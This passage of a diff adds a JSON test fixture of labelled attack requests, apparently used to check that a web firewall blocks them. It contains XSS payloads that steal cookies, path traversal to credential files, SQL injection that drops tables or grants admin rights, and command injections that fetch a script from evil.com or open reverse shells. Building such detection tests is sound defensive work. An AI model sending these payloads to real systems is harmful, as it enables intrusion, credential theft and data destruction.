+ "url": "/api/comments?msg=<script>alert('XSS')</script>&variation=167",
1963
+ "headers": {
1964
+ "user-agent": "AttackVerificationHarness/2.0"
1965
+ }
1966
+ },
1967
+ {
1968
+ "id": "ATK-VAR-167",
1969
+ "category": "XSS",
1970
+ "severity": "high",
1971
+ "expectedAction": "temporary_block",
1972
+ "method": "POST",
1973
+ "url": "/api/profile?v=168",
1974
+ "headers": {
1975
+ "user-agent": "AttackVerificationHarness/2.0"
1976
+ },
1977
+ "body": {
1978
+ "bio": "<img src=x onerror=alert(document.cookie)>"
1979
+ }
1980
+ },
1981
+ {
1982
+ "id": "ATK-VAR-168",
1983
+ "category": "XSS",
1984
+ "severity": "high",
1985
+ "expectedAction": "temporary_block",
1986
+ "method": "GET",
1987
+ "url": "/api/feedback?text=javascript:alert(1)&variation=169",
1988
+ "headers": {
1989
+ "user-agent": "AttackVerificationHarness/2.0"
1990
+ }
1991
+ },
1992
+ {
1993
+ "id": "ATK-VAR-169",
1994
+ "category": "XSS",
1995
+ "severity": "high",
1996
+ "expectedAction": "temporary_block",
1997
+ "method": "GET",
1998
+ "url": "/api/view?name=<svg onload=alert('XSS')>&variation=170",
1999
+ "headers": {
2000
+ "user-agent": "AttackVerificationHarness/2.0"
2001
+ }
2002
+ },
2003
+ {
2004
+ "id": "ATK-VAR-170",
2005
+ "category": "XSS",
2006
+ "severity": "high",
2007
+ "expectedAction": "temporary_block",
2008
+ "method": "POST",
2009
+ "url": "/api/items?v=171",
2010
+ "headers": {
2011
+ "user-agent": "AttackVerificationHarness/2.0"
2012
+ },
2013
+ "body": {
2014
+ "desc": "<iframe src=javascript:document.cookie>"
2015
+ }
2016
+ },
2017
+ {
2018
+ "id": "ATK-VAR-171",
2019
+ "category": "XSS",
2020
+ "severity": "high",
2021
+ "expectedAction": "temporary_block",
2022
+ "method": "GET",
2023
+ "url": "/api/render?html=<body onload=eval(atob('ZG9jdW1lbnQud3JpdGUoMSk='))>&variation=172",
2024
+ "headers": {
2025
+ "user-agent": "AttackVerificationHarness/2.0"
2026
+ }
2027
+ },
2028
+ {
2029
+ "id": "ATK-VAR-172",
2030
+ "category": "XSS",
2031
+ "severity": "medium",
2032
+ "expectedAction": "rate_limited",
2033
+ "method": "POST",
2034
+ "url": "/api/post?v=173",
2035
+ "headers": {
2036
+ "user-agent": "AttackVerificationHarness/2.0"
2037
+ },
2038
+ "body": {
2039
+ "content": "<div onclick=\"document.write('hacked')\">"
2040
+ }
2041
+ },
2042
+ {
2043
+ "id": "ATK-VAR-173",
2044
+ "category": "XSS",
2045
+ "severity": "high",
2046
+ "expectedAction": "temporary_block",
2047
+ "method": "GET",
2048
+ "url": "/api/user?name=<input onfocus=alert(1) autofocus>&variation=174",
2049
+ "headers": {
2050
+ "user-agent": "AttackVerificationHarness/2.0"
2051
+ }
2052
+ },
2053
+ {
2054
+ "id": "ATK-VAR-174",
2055
+ "category": "XSS",
2056
+ "severity": "medium",
2057
+ "expectedAction": "rate_limited",
2058
+ "method": "GET",
2059
+ "url": "/api/echo?s=document.cookie&variation=175",
2060
+ "headers": {
2061
+ "user-agent": "AttackVerificationHarness/2.0"
2062
+ }
2063
+ },
2064
+ {
2065
+ "id": "ATK-VAR-175",
2066
+ "category": "XSS",
2067
+ "severity": "critical",
2068
+ "expectedAction": "blocked",
2069
+ "method": "GET",
2070
+ "url": "/api/tag?t=<script src='http://evil.com/xss.js'></script>&variation=176",
2071
+ "headers": {
2072
+ "user-agent": "AttackVerificationHarness/2.0"
2073
+ }
2074
+ },
2075
+ {
2076
+ "id": "ATK-VAR-176",
2077
+ "category": "XSS",
2078
+ "severity": "critical",
2079
+ "expectedAction": "blocked",
2080
+ "method": "POST",
2081
+ "url": "/api/note?v=177",
2082
+ "headers": {
2083
+ "user-agent": "AttackVerificationHarness/2.0"
2084
+ },
2085
+ "body": {
2086
+ "note": "test<script>fetch('/stolen?c='+document.cookie)</script>"
2087
+ }
2088
+ },
2089
+ {
2090
+ "id": "ATK-VAR-177",
2091
+ "category": "XSS",
2092
+ "severity": "high",
2093
+ "expectedAction": "temporary_block",
2094
+ "method": "GET",
2095
+ "url": "/api/search?q=<a href='javascript:alert(1)'>click me</a>&variation=178",
2096
+ "headers": {
2097
+ "user-agent": "AttackVerificationHarness/2.0"
2098
+ }
2099
+ },
2100
+ {
2101
+ "id": "ATK-VAR-178",
2102
+ "category": "PATH_TRAVERSAL",
2103
+ "severity": "critical",
2104
+ "expectedAction": "blocked",
2105
+ "method": "GET",
2106
+ "url": "/api/download?file=../../../../etc/passwd&variation=179",
2107
+ "headers": {
2108
+ "user-agent": "AttackVerificationHarness/2.0"
2109
+ }
2110
+ },
2111
+ {
2112
+ "id": "ATK-VAR-179",
2113
+ "category": "PATH_TRAVERSAL",
2114
+ "severity": "critical",
2115
+ "expectedAction": "blocked",
2116
+ "method": "GET",
2117
+ "url": "/api/view?path=..%2F..%2F..%2Fwindows%2Fsystem32%2Fcmd.exe&variation=180",
2118
+ "headers": {
2119
+ "user-agent": "AttackVerificationHarness/2.0"
2120
+ }
2121
+ },
2122
+ {
2123
+ "id": "ATK-VAR-180",
2124
+ "category": "PATH_TRAVERSAL",
2125
+ "severity": "critical",
2126
+ "expectedAction": "blocked",
2127
+ "method": "GET",
2128
+ "url": "/api/read?file=../../../etc/shadow&variation=181",
2129
+ "headers": {
2130
+ "user-agent": "AttackVerificationHarness/2.0"
2131
+ }
2132
+ },
2133
+ {
2134
+ "id": "ATK-VAR-181",
2135
+ "category": "PATH_TRAVERSAL",
2136
+ "severity": "high",
2137
+ "expectedAction": "temporary_block",
2138
+ "method": "GET",
2139
+ "url": "/api/load?doc=..\\..\\..\\boot.ini&variation=182",
2140
+ "headers": {
2141
+ "user-agent": "AttackVerificationHarness/2.0"
2142
+ }
2143
+ },
2144
+ {
2145
+ "id": "ATK-VAR-182",
2146
+ "category": "PATH_TRAVERSAL",
2147
+ "severity": "critical",
2148
+ "expectedAction": "blocked",
2149
+ "method": "GET",
2150
+ "url": "/api/static?file=....//....//etc/passwd&variation=183",
2151
+ "headers": {
2152
+ "user-agent": "AttackVerificationHarness/2.0"
2153
+ }
2154
+ },
2155
+ {
2156
+ "id": "ATK-VAR-183",
2157
+ "category": "PATH_TRAVERSAL",
2158
+ "severity": "high",
2159
+ "expectedAction": "temporary_block",
2160
+ "method": "GET",
2161
+ "url": "/api/fetch?res=../../../../var/log/auth.log&variation=184",
2162
+ "headers": {
2163
+ "user-agent": "AttackVerificationHarness/2.0"
2164
+ }
2165
+ },
2166
+ {
2167
+ "id": "ATK-VAR-184",
2168
+ "category": "PATH_TRAVERSAL",
2169
+ "severity": "high",
2170
+ "expectedAction": "temporary_block",
2171
+ "method": "GET",
2172
+ "url": "/api/asset?img=../../../etc/hosts&variation=185",
2173
+ "headers": {
2174
+ "user-agent": "AttackVerificationHarness/2.0"
2175
+ }
2176
+ },
2177
+ {
2178
+ "id": "ATK-VAR-185",
2179
+ "category": "PATH_TRAVERSAL",
2180
+ "severity": "critical",
2181
+ "expectedAction": "blocked",
2182
+ "method": "GET",
2183
+ "url": "/api/files/download?f=../../../../app/.env&variation=186",
2184
+ "headers": {
2185
+ "user-agent": "AttackVerificationHarness/2.0"
2186
+ }
2187
+ },
2188
+ {
2189
+ "id": "ATK-VAR-186",
2190
+ "category": "PATH_TRAVERSAL",
2191
+ "severity": "high",
2192
+ "expectedAction": "temporary_block",
2193
+ "method": "GET",
2194
+ "url": "/api/docs?p=..%2F..%2F..%2Fetc%2Fgroup&variation=187",
2195
+ "headers": {
2196
+ "user-agent": "AttackVerificationHarness/2.0"
2197
+ }
2198
+ },
2199
+ {
2200
+ "id": "ATK-VAR-187",
2201
+ "category": "PATH_TRAVERSAL",
2202
+ "severity": "high",
2203
+ "expectedAction": "temporary_block",
2204
+ "method": "GET",
2205
+ "url": "/api/export?path=../../../../usr/local/etc/config&variation=188",
2206
+ "headers": {
2207
+ "user-agent": "AttackVerificationHarness/2.0"
2208
+ }
2209
+ },
2210
+ {
2211
+ "id": "ATK-VAR-188",
2212
+ "category": "COMMAND_INJECTION",
2213
+ "severity": "critical",
2214
+ "expectedAction": "blocked",
2215
+ "method": "GET",
2216
+ "url": "/api/ping?host=127.0.0.1; cat /etc/passwd&variation=189",
2217
+ "headers": {
2218
+ "user-agent": "AttackVerificationHarness/2.0"
2219
+ }
2220
+ },
2221
+ {
2222
+ "id": "ATK-VAR-189",
2223
+ "category": "COMMAND_INJECTION",
2224
+ "severity": "critical",
2225
+ "expectedAction": "blocked",
2226
+ "method": "GET",
2227
+ "url": "/api/dns?domain=google.com && whoami&variation=190",
2228
+ "headers": {
2229
+ "user-agent": "AttackVerificationHarness/2.0"
2230
+ }
2231
+ },
2232
+ {
2233
+ "id": "ATK-VAR-190",
2234
+ "category": "COMMAND_INJECTION",
2235
+ "severity": "critical",
2236
+ "expectedAction": "blocked",
2237
+ "method": "GET",
2238
+ "url": "/api/test?cmd=127.0.0.1 | ls -la&variation=191",
2239
+ "headers": {
2240
+ "user-agent": "AttackVerificationHarness/2.0"
2241
+ }
2242
+ },
2243
+ {
2244
+ "id": "ATK-VAR-191",
2245
+ "category": "COMMAND_INJECTION",
2246
+ "severity": "critical",
2247
+ "expectedAction": "blocked",
2248
+ "method": "POST",
2249
+ "url": "/api/exec?v=192",
2250
+ "headers": {
2251
+ "user-agent": "AttackVerificationHarness/2.0"
2252
+ },
2253
+ "body": {
2254
+ "command": "test `id`"
2255
+ }
2256
+ },
2257
+ {
2258
+ "id": "ATK-VAR-192",
2259
+ "category": "COMMAND_INJECTION",
2260
+ "severity": "critical",
2261
+ "expectedAction": "blocked",
2262
+ "method": "GET",
2263
+ "url": "/api/network?ip=127.0.0.1; wget http://evil.com/malware.sh&variation=193",
2264
+ "headers": {
2265
+ "user-agent": "AttackVerificationHarness/2.0"
2266
+ }
2267
+ },
2268
+ {
2269
+ "id": "ATK-VAR-193",
2270
+ "category": "COMMAND_INJECTION",
2271
+ "severity": "critical",
2272
+ "expectedAction": "blocked",
2273
+ "method": "GET",
2274
+ "url": "/api/status?host=localhost; uname -a&variation=194",
2275
+ "headers": {
2276
+ "user-agent": "AttackVerificationHarness/2.0"
2277
+ }
2278
+ },
2279
+ {
2280
+ "id": "ATK-VAR-194",
2281
+ "category": "COMMAND_INJECTION",
2282
+ "severity": "critical",
2283
+ "expectedAction": "blocked",
2284
+ "method": "POST",
2285
+ "url": "/api/run?v=195",
2286
+ "headers": {
2287
+ "user-agent": "AttackVerificationHarness/2.0"
2288
+ },
2289
+ "body": {
2290
+ "script": "$(nc -e /bin/sh 10.0.0.1 4444)"
2291
+ }
2292
+ },
2293
+ {
2294
+ "id": "ATK-VAR-195",
2295
+ "category": "COMMAND_INJECTION",
2296
+ "severity": "critical",
2297
+ "expectedAction": "blocked",
2298
+ "method": "GET",
2299
+ "url": "/api/calc?expr=1; python -c 'import socket'&variation=196",
2300
+ "headers": {
2301
+ "user-agent": "AttackVerificationHarness/2.0"
2302
+ }
2303
+ },
2304
+ {
2305
+ "id": "ATK-VAR-196",
2306
+ "category": "COMMAND_INJECTION",
2307
+ "severity": "critical",
2308
+ "expectedAction": "blocked",
2309
+ "method": "GET",
2310
+ "url": "/api/service?name=app && id&variation=197",
2311
+ "headers": {
2312
+ "user-agent": "AttackVerificationHarness/2.0"
2313
+ }
2314
+ },
2315
+ {
2316
+ "id": "ATK-VAR-197",
2317
+ "category": "COMMAND_INJECTION",
2318
+ "severity": "critical",
2319
+ "expectedAction": "blocked",
2320
+ "method": "GET",
2321
+ "url": "/api/backup?dest=/tmp; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1&variation=198",
2322
+ "headers": {
2323
+ "user-agent": "AttackVerificationHarness/2.0"
2324
+ }
2325
+ },
2326
+ {
2327
+ "id": "ATK-VAR-198",
2328
+ "category": "SSTI",
2329
+ "severity": "high",
2330
+ "expectedAction": "temporary_block",
2331
+ "method": "GET",
2332
+ "url": "/api/render?template={{7*7}}&variation=199",
2333
+ "headers": {
2334
+ "user-agent": "AttackVerificationHarness/2.0"
2335
+ }
2336
+ },
2337
+ {
2338
+ "id": "ATK-VAR-199",
2339
+ "category": "SSTI",
2340
+ "severity": "high",
2341
+ "expectedAction": "temporary_block",
2342
+ "method": "GET",
2343
+ "url": "/api/greeting?name=${7*7}&variation=200",
2344
+ "headers": {
2345
+ "user-agent": "AttackVerificationHarness/2.0"
2346
+ }
2347
+ },
2348
+ {
2349
+ "id": "ATK-VAR-200",
2350
+ "category": "SSTI",
2351
+ "severity": "critical",
2352
+ "expectedAction": "blocked",
2353
+ "method": "GET",
2354
+ "url": "/api/page?tpl={{config.items()}}&variation=201",
2355
+ "headers": {
2356
+ "user-agent": "AttackVerificationHarness/2.0"
2357
+ }
2358
+ },
2359
+ {
2360
+ "id": "ATK-VAR-201",
2361
+ "category": "SQL_INJECTION",
2362
+ "severity": "critical",
2363
+ "expectedAction": "blocked",
2364
+ "method": "GET",
2365
+ "url": "/api/search?q=' OR '1'='1&variation=202",
2366
+ "headers": {
2367
+ "user-agent": "AttackVerificationHarness/2.0"
2368
+ }
2369
+ },
2370
+ {
2371
+ "id": "ATK-VAR-202",
2372
+ "category": "SQL_INJECTION",
2373
+ "severity": "critical",
2374
+ "expectedAction": "blocked",
2375
+ "method": "GET",
2376
+ "url": "/api/users?id=1 UNION SELECT null, username, password FROM users--&variation=203",
2377
+ "headers": {
2378
+ "user-agent": "AttackVerificationHarness/2.0"
2379
+ }
2380
+ },
2381
+ {
2382
+ "id": "ATK-VAR-203",
2383
+ "category": "SQL_INJECTION",
2384
+ "severity": "critical",
2385
+ "expectedAction": "blocked",
2386
+ "method": "GET",
2387
+ "url": "/api/items?cat=tech'; DROP TABLE products;--&variation=204",
2388
+ "headers": {
2389
+ "user-agent": "AttackVerificationHarness/2.0"
2390
+ }
2391
+ },
2392
+ {
2393
+ "id": "ATK-VAR-204",
2394
+ "category": "SQL_INJECTION",
2395
+ "severity": "critical",
2396
+ "expectedAction": "blocked",
2397
+ "method": "POST",
2398
+ "url": "/api/login?v=205",
2399
+ "headers": {
2400
+ "user-agent": "AttackVerificationHarness/2.0"
2401
+ },
2402
+ "body": {
2403
+ "username": "admin' --",
2404
+ "password": "pwd"
2405
+ }
2406
+ },
2407
+ {
2408
+ "id": "ATK-VAR-205",
2409
+ "category": "SQL_INJECTION",
2410
+ "severity": "critical",
2411
+ "expectedAction": "blocked",
2412
+ "method": "POST",
2413
+ "url": "/api/login?v=206",
2414
+ "headers": {
2415
+ "user-agent": "AttackVerificationHarness/2.0"
2416
+ },
2417
+ "body": {
2418
+ "username": "admin' OR 1=1 #",
2419
+ "password": "pwd"
2420
+ }
2421
+ },
2422
+ {
2423
+ "id": "ATK-VAR-206",
2424
+ "category": "SQL_INJECTION",
2425
+ "severity": "critical",
2426
+ "expectedAction": "blocked",
2427
+ "method": "GET",
2428
+ "url": "/api/query?sort=name; EXEC xp_cmdshell('dir')&variation=207",
2429
+ "headers": {
2430
+ "user-agent": "AttackVerificationHarness/2.0"
2431
+ }
2432
+ },
2433
+ {
2434
+ "id": "ATK-VAR-207",
2435
+ "category": "SQL_INJECTION",
2436
+ "severity": "critical",
2437
+ "expectedAction": "blocked",
2438
+ "method": "GET",
2439
+ "url": "/api/filter?val=%27%20OR%201%3D1--&variation=208",
2440
+ "headers": {
2441
+ "user-agent": "AttackVerificationHarness/2.0"
2442
+ }
2443
+ },
2444
+ {
2445
+ "id": "ATK-VAR-208",
2446
+ "category": "SQL_INJECTION",
2447
+ "severity": "high",
2448
+ "expectedAction": "temporary_block",
2449
+ "method": "GET",
2450
+ "url": "/api/check?code=' or 1=1&variation=209",
2451
+ "headers": {
2452
+ "user-agent": "AttackVerificationHarness/2.0"
2453
+ }
2454
+ },
2455
+ {
2456
+ "id": "ATK-VAR-209",
2457
+ "category": "SQL_INJECTION",
2458
+ "severity": "high",
2459
+ "expectedAction": "temporary_block",
2460
+ "method": "GET",
2461
+ "url": "/api/orders?status=active' AND 1=1--&variation=210",
2462
+ "headers": {
2463
+ "user-agent": "AttackVerificationHarness/2.0"
2464
+ }
2465
+ },
2466
+ {
2467
+ "id": "ATK-VAR-210",
2468
+ "category": "SQL_INJECTION",
2469
+ "severity": "high",
2470
+ "expectedAction": "temporary_block",
2471
+ "method": "POST",
2472
+ "url": "/api/data?v=211",
2473
+ "headers": {
2474
+ "user-agent": "AttackVerificationHarness/2.0"
2475
+ },
2476
+ "body": {
2477
+ "filter": "1' or 'a'='a"
2478
+ }
2479
+ },
2480
+ {
2481
+ "id": "ATK-VAR-211",
2482
+ "category": "SQL_INJECTION",
2483
+ "severity": "critical",
2484
+ "expectedAction": "blocked",
2485
+ "method": "GET",
2486
+ "url": "/api/records?filter=test' union select 1,2,3--&variation=212",
2487
+ "headers": {
2488
+ "user-agent": "AttackVerificationHarness/2.0"
2489
+ }
2490
+ },
2491
+ {
2492
+ "id": "ATK-VAR-212",
2493
+ "category": "SQL_INJECTION",
2494
+ "severity": "critical",
2495
+ "expectedAction": "blocked",
2496
+ "method": "GET",
2497
+ "url": "/api/audit?q=1; INSERT INTO users VALUES ('hacker','pwd')&variation=213",
2498
+ "headers": {
2499
+ "user-agent": "AttackVerificationHarness/2.0"
2500
+ }
2501
+ },
2502
+ {
2503
+ "id": "ATK-VAR-213",
2504
+ "category": "SQL_INJECTION",
2505
+ "severity": "critical",
2506
+ "expectedAction": "blocked",
2507
+ "method": "GET",
2508
+ "url": "/api/audit?q=1; DELETE FROM logs WHERE 1=1&variation=214",
2509
+ "headers": {
2510
+ "user-agent": "AttackVerificationHarness/2.0"
2511
+ }
2512
+ },
2513
+ {
2514
+ "id": "ATK-VAR-214",
2515
+ "category": "SQL_INJECTION",
2516
+ "severity": "critical",
2517
+ "expectedAction": "blocked",
2518
+ "method": "GET",
2519
+ "url": "/api/audit?q=1; UPDATE users SET role='admin' WHERE id=5&variation=215",
2520
+ "headers": {
2521
+ "user-agent": "AttackVerificationHarness/2.0"
2522
+ }
2523
+ },
2524
+ {
2525
+ "id": "ATK-VAR-215",
2526
+ "category": "SQL_INJECTION",
2527
+ "severity": "high",
2528
+ "expectedAction": "temporary_block",
2529
+ "method": "GET",
2530
+ "url": "/api/search?q=test%27%20and%201%3D1&variation=216",
2531
+ "headers": {
2532
+ "user-agent": "AttackVerificationHarness/2.0"
2533
+ }
2534
+ },
2535
+ {
2536
+ "id": "ATK-VAR-216",
2537
+ "category": "XSS",
2538
+ "severity": "high",
2539
+ "expectedAction": "temporary_block",
2540
+ "method": "GET",
2541
+ "url": "/api/comments?msg=<script>alert('XSS')</script>&variation=217",
2542
+ "headers": {
2543
+ "user-agent": "AttackVerificationHarness/2.0"
2544
+ }
2545
+ },
2546
+ {
2547
+ "id": "ATK-VAR-217",
2548
+ "category": "XSS",
2549
+ "severity": "high",
2550
+ "expectedAction": "temporary_block",
2551
+ "method": "POST",
2552
+ "url": "/api/profile?v=218",
2553
+ "headers": {
2554
+ "user-agent": "AttackVerificationHarness/2.0"
2555
+ },
2556
+ "body": {
2557
+ "bio": "<img src=x onerror=alert(document.cookie)>"
2558
+ }
2559
+ },
2560
+ {
2561
+ "id": "ATK-VAR-218",
2562
+ "category": "XSS",
2563
+ "severity": "high",
2564
+ "expectedAction": "temporary_block",
2565
+ "method": "GET",
2566
+ "url": "/api/feedback?text=javascript:alert(1)&variation=219",
2567
+ "headers": {
2568
+ "user-agent": "AttackVerificationHarness/2.0"
2569
+ }
2570
+ },
2571
+ {
2572
+ "id": "ATK-VAR-219",
2573
+ "category": "XSS",
2574
+ "severity": "high",
2575
+ "expectedAction": "temporary_block",
2576
+ "method": "GET",
2577
+ "url": "/api/view?name=<svg onload=alert('XSS')>&variation=220",
2578
+ "headers": {
2579
+ "user-agent": "AttackVerificationHarness/2.0"
2580
+ }
2581
+ },
2582
+ {
2583
+ "id": "ATK-VAR-220",
2584
+ "category": "XSS",
2585
+ "severity": "high",
2586
+ "expectedAction": "temporary_block",
2587
+ "method": "POST",
2588
+ "url": "/api/items?v=221",
2589
+ "headers": {
2590
+ "user-agent": "AttackVerificationHarness/2.0"
2591
+ },
2592
+ "body": {
2593
+ "desc": "<iframe src=javascript:document.cookie>"
2594
+ }
2595
+ }
2596
+ ]